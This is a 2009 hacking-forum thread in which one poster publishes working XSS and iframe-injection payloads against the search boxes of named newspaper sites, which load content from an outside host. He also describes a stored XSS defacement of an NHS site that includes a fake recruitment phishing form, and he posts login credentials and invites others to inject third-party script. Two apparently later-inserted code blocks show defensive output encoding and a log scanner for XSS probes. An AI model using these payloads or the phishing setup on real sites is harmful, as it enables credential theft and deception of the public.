[-TE-]-Methodman
2009-08-13 19:50:42
Philip_Clarke
2009-08-14 17:20:43
Like I said, I'd like to become a member. Your "friends" over at the Times quoting Neo have been informed of this iframe injection.
Code: <iframe src=http://nemesis.te-home.net/Forum/. />
in the search box for the TLS archive leads to this

(sometimes you need to put a - in front of the search term to make sure the search generates results.) And when you do this in the Times search box
Code: '';!--"<script>alert('0 -xss')</script>=&{()}
You get an XSS (about 5 or 6, as the vulnerability is based on the advertising links constructed from the search).

Journalists, news desk informed (as part of an ongoing story), no response.
I'll post this under Visa until I can have admin rights to start a new thread.
Philip nod@3xlock.com
[-TE-]-Neo
2009-08-14 23:33:36
Good job, Philip. :P
____________________
']['€AM€LiT€
Philip_Clarke
2009-08-14 23:45:23
[-TE-]-Neo wrote:
    Good job, Philip. :P
Thank you. I have more, but not having privileges to start a new thread is an inconvenience.
Philip_Clarke
2009-08-15 03:51:02
Guardian Newspaper (and Yahoo) XSS script injection
using
in the search box at http://www.guardian.co.uk/ gives nothing, but if you click on the "search user contributions" radio button it goes off to Yahoo (apparent URL is http://uk.search.yahoo.com/search in the HTML source) with the same query, which completes some JavaScript code when the page loads, et voilà.

Eventual URL: http://www.guardian.co.uk/search/users?search=%27%3Balert(%27XSS%27)%3Ba%3D%27&searchType=user
Then, using a similar technique, I close the script off nicely, open an iframe and then open the script to get an iframe. This one needs you to create your own form though, since it exceeds the size value of the input box.
Code: ';</script><iframe src=http://nemesis.te-home.net/ /><script>a='

I'd like to have Neo mail me, I need to discuss his TimesOnline contact about something I've been working on.
Thank you.
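The two reflection points described in the Times post above and in this Guardian post (a search term echoed into page HTML, and a search term echoed into a JavaScript string literal inside a <script> element) have the same fix: encode the value for the exact context it lands in. The block below is an added example written for this edit, not code from the thread or from any site it names. The page templates, the function names and the `analyseScriptContext` check are assumptions; the two payloads are the ones quoted in the thread. `analyseScriptContext` cuts the page at the first "</script" the way a browser's parser does, executes the surviving script, and reports whether the value round-tripped and whether any tag was left for the HTML parser to process.

```javascript
// Added example, not code from the thread or from any of the sites named in
// it. Templates are constructed; the two payloads are quoted from the thread.

const IFRAME_PAYLOAD = '<iframe src=http://nemesis.te-home.net/Forum/. />';
const GUARDIAN_PAYLOAD = "';</script><iframe src=http://nemesis.te-home.net/ /><script>a='";

// Encoding for an HTML text node or a quoted attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Encoding for a JavaScript string literal inside a <script> element.
// JSON.stringify escapes quotes and backslashes; '<' and '>' are then written
// as \u escapes so the HTML parser can never see "</script" inside the
// literal, and the two line terminators JSON leaves raw are escaped as well.
function encodeJsString(s) {
  return JSON.stringify(String(s))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Constructed templates (assumed). safe=false is the raw concatenation the
// thread's findings depend on; safe=true applies the context-specific encoder.
function renderHtmlContext(term, safe) {
  return `<h1>Results for ${safe ? escapeHtml(term) : term}</h1>`;
}

function renderScriptContext(term, safe) {
  const literal = safe ? encodeJsString(term) : `'${term}'`;
  return `<script>var query = ${literal};</script>`;
}

// Split a page at its first <script> element the way an HTML parser does:
// script content runs until the first "</script", whatever precedes it.
function extractFirstScript(html) {
  const open = html.indexOf('<script>');
  if (open < 0) return null;
  const start = open + '<script>'.length;
  const close = html.toLowerCase().indexOf('</script', start);
  if (close < 0) return null;
  return { code: html.slice(start, close), rest: html.slice(close) };
}

// Execute the extracted script and report (a) the value `query` ended up
// holding and (b) whether a script or iframe tag is left over after the
// element closed, i.e. markup the browser would go on to parse as HTML.
function analyseScriptContext(html) {
  const script = extractFirstScript(html);
  const query = new Function(`${script.code}; return typeof query === 'undefined' ? null : query;`)();
  const leftover = script.rest.replace(/^<\/script\s*>/i, '');
  return { query, injectedTag: /<(script|iframe)\b/i.test(leftover) };
}

// Demonstration: raw concatenation lets the literal end early and an iframe
// follow it; the encoded version round-trips the whole term as data.
console.log('unsafe:', analyseScriptContext(renderScriptContext(GUARDIAN_PAYLOAD, false)));
console.log('safe:  ', analyseScriptContext(renderScriptContext(GUARDIAN_PAYLOAD, true)));
console.log('html:  ', renderHtmlContext(IFRAME_PAYLOAD, true));
```

The point of `analyseScriptContext` is that the two contexts fail differently: in the unsafe script template the literal closes at the payload's first quote, `query` comes back empty, and everything after the payload's `</script>` is ordinary markup again, which is why the Guardian post's iframe appears. HTML-escaping alone does not help in the script context, and JS-string escaping does not help in the HTML context, so a template needs one encoder per context.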
Philip_Clarke
2009-08-15 03:55:10
Philip_Clarke wrote:
    Guardian Newspaper (and Yahoo) XSS script injection
    using
    in the search box at http://www.guardian.co.uk/ gives nothing, but if you click on the "search user contributions" radio button it goes off to Yahoo (apparent URL is http://uk.search.yahoo.com/search in the HTML source) with the same query, which completes some JavaScript code when the page loads, et voilà.

    Eventual URL: http://www.guardian.co.uk/search/users?search=%27%3Balert(%27XSS%27)%3Ba%3D%27&searchType=user
    Then, using a similar technique, I close the script off nicely, open an iframe and then open the script to get an iframe. This one needs you to create your own form though, since it exceeds the size value of the input box.
    Code: ';</script><iframe src=http://nemesis.te-home.net/ /><script>a='

    I'd like to have Neo mail me, I need to discuss his TimesOnline contact about something I've been working on.
    Thank you.
This BB code really doesn't like me, it didn't like the https:// for the images.
Philip_Clarke
2009-08-15 04:09:37
News of the Newspaper XSS script and iframe injection
Last one before I go to bed.
http://www.newsoftheworld.co.uk/
Code: <script>alaert('xss')</script>
makes a mess of the page (tried tidying it up but there's a character limit to the textbox and it's late in the UK).

Then a very routine iframe injection
Code: <iframe src=http://nemesis.te-home.net />

Absolutely sod all protection on that search box apart from the character limit, and that was more likely by accident than design.
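A site with no filtering on its search box, as this post describes, still leaves the probes in its access log. The block below is an added example, not code from the thread: a minimal scanner that parses combined-format log lines, decodes each query-string parameter (including a second layer of percent-encoding) and flags the markup and script fragments a reflected-XSS probe leaves behind. The log lines and addresses are constructed (RFC 5737 documentation ranges), the first request path is the URL quoted in the Guardian post, and the indicator list and function names are assumptions.

```javascript
// Added example, not code from the thread. Sample log lines are constructed
// for this example; the first path is the URL quoted in the Guardian post.

const SAMPLE_LOG = [
  '203.0.113.7 - - [15/Aug/2009:03:51:02 +0100] "GET /search/users?search=%27%3Balert(%27XSS%27)%3Ba%3D%27&searchType=user HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [15/Aug/2009:04:09:37 +0100] "GET /search?q=%3Ciframe+src%3Dhttp%3A%2F%2Fexample.invalid+%2F%3E HTTP/1.1" 200 4801 "-" "Mozilla/5.0"',
  '198.51.100.22 - - [15/Aug/2009:04:10:11 +0100] "GET /search?q=swine+flu+symptoms HTTP/1.1" 200 7330 "-" "Mozilla/5.0"',
  '198.51.100.22 - - [15/Aug/2009:04:10:40 +0100] "GET /health/a-z HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
];

// Indicators checked against the fully decoded parameter value (assumed list).
const INDICATORS = [
  ['script-tag', /<\/?script\b/i],
  ['iframe-tag', /<iframe\b/i],
  ['event-handler', /\bon[a-z]+\s*=/i],
  ['javascript-url', /javascript\s*:/i],
  ['function-call', /\b(alert|prompt|confirm|eval)\s*\(/i],
  ['quote-breakout', /['"]\s*;/],
];

// Apache/nginx combined log format: ip ident user [time] "method path proto" status ...
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) /;

function parseLogLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], path: m[4], status: Number(m[5]) };
}

// Peel off up to two further layers of percent-encoding. URLSearchParams has
// already removed one, so this also catches double-encoded probes.
function fullyDecode(value) {
  let out = value;
  for (let i = 0; i < 2; i++) {
    try {
      const next = decodeURIComponent(out);
      if (next === out) break;
      out = next;
    } catch (e) {
      break; // malformed escape sequence: keep what we have
    }
  }
  return out;
}

function matchIndicators(value) {
  return INDICATORS.filter(([, re]) => re.test(value)).map(([name]) => name);
}

// Walk the log and return one finding per parameter that matched an indicator.
function scanLog(lines) {
  const findings = [];
  for (const line of lines) {
    const entry = parseLogLine(line);
    if (!entry) continue;
    const url = new URL(entry.path, 'http://log.invalid'); // base only for parsing
    for (const [param, raw] of url.searchParams) {
      const value = fullyDecode(raw);
      const indicators = matchIndicators(value);
      if (indicators.length) {
        findings.push({ ip: entry.ip, time: entry.time, path: url.pathname, param, value, indicators });
      }
    }
  }
  return findings;
}

for (const f of scanLog(SAMPLE_LOG)) {
  console.log(`${f.time} ${f.ip} ${f.path} ${f.param}=${JSON.stringify(f.value)} [${f.indicators.join(', ')}]`);
}
```

Run against the constructed log, the scanner reports the two probe requests from 203.0.113.7 and ignores the benign "swine flu symptoms" search and the request without a query string. Indicators such as `quote-breakout` and `function-call` fire on harmless input occasionally, so in practice this belongs behind a threshold (several indicators, or several hits from one client in a short window) rather than as a one-hit alert.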
[-TE-]-Neo
2009-08-15 09:38:28
Philip_Clarke wrote:
    Thank you. I have more, but not having privileges to start a new thread is an inconvenience.
That's weird, you should have the right to post new topics - scroll down to see "Post New Topic".
Philip_Clarke
2009-08-15 17:53:37
[-TE-]-Neo wrote:
    Philip_Clarke wrote:
        Thank you. I have more, but not having privileges to start a new thread is an inconvenience.
    That's weird, you should have the right to post new topics - scroll down to see "Post New Topic".
Nope (Firefox user), no new topics in the XSS section at all. Anyway, this is what I wanted to post as a new topic, so I'd appreciate it if you'd split it out. It was also what I wanted to discuss with you (Neo).
This is an in-depth XSS exploit and rewrite of www.nhs.uk.
I have tried contacting the news agencies etc., MPs, the website administrator... This is now over 96 hours old and I thought it would have been picked up.
The story is that I am a 37-year-old director of a small company that makes PHP software, one of which stops exploits (old timer, I don't even have a nick, and that would vaporize the myth about kiddies). When I read about the MOD and MI5 hacks, and then the Home Office stating that the attack on MI5 was trivial, I thought of all the things that could be done: poisoned search results, misinformation (as everything is redirected through the search page), installing key loggers on the machines of people who were searching for specific information. So I went to see what I could find to prove these points and to prove that an XSS exploit is not "trivial". I found an exploit in the logged-on section of http://www.nhs.co.uk, so I figured that what was needed was a demonstration to lure people into the site.
A mailing list inviting people to take part in a health questionnaire would be nice and personal.
I would suggest a job advertisement sent out to top executives looking for an IT Director, so I registered the domain nhs-recruitment.co.uk and used that to create a
username:
applicant@nhs-recruitment.co.uk
with a password
IT-director
You can log in and see how the page changes from a normal page to a two/three-line form asking for details to be submitted. I have disabled the links using JavaScript. (Please no one alter this, as I want the government to see it; if you want to, create your own account.)
If you click on the Editorial Policy link below, there is a big page of text explaining my reasons for doing this and listing the MP, civil servant (in charge of the UK's Twitter policy, actually) and Baroness (former head of MI5) that I have tried to contact about this and the seriousness.
Oh, and I put a penguin on the swine flu page: mouse over Health A-Z and then click on swine flu, follow me.
So that's http://www.nhs.co.uk
click the login text top right
username: applicant@nhs-recruitment.co.uk password: IT-director
BTW, you will notice a long explanation about why the server is not rooted; this is for the benefit of the civil servants who may think that the "computer" has been taken over and don't understand the concepts of XSS.
I invite anyone to create their own user-friendly pages, create an account, pull some script in from a third party; they use jQuery so there's plenty of scope for manipulation. Maybe set up some amusing guidelines for us to have a look at?
Below are some screenshots. Best experienced using Firefox, although IE8 was very fast at rendering the scripts.
Thank you, Philip.
The altered logged-in page (click on "Start your new career" to get the application form displaying using a nice jQuery slidedown)

links are disabled so I could direct anyone to any page, real or false

click on Editorial Policy to get the explanation to the civil service and government why XSS is serious and why the server is not rooted

mouse over the Health A-Z to get to the swine flu information.